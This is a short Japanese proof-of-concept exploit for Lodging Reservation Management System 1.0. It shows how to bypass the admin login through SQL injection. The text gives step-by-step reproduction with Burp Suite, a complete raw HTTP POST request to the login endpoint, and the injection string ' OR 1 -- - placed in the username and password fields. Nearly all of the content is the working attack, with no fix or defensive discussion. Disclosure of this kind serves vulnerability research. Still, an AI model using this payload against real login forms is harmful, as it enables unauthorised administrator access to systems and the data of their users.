
Lodging Reservation Management System 1.0のSQLインジェクションと認証バイパスの概念実証エクスプロイトで、細工されたペイロードを介して不正な管理者アクセスを可能にします。
#再現手順: ステップ1 製品の管理者パネル http://localhost/lodge/admin/login.php にアクセスします。 ステップ2 – ユーザー名とパスワードに任意の値を入力します。 ステップ3 – 「ログイン」をクリックし、Burp Suiteでリクエストをキャプチャします。 ステップ4 – ユーザー名を ' OR 1 -- - に、パスワードを ' OR 1 -- - に変更します。 ステップ5 – Forwardをクリックすると、管理者としてログインできます。
POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
Username: ' or 1 -- - Password: ' or 1 -- -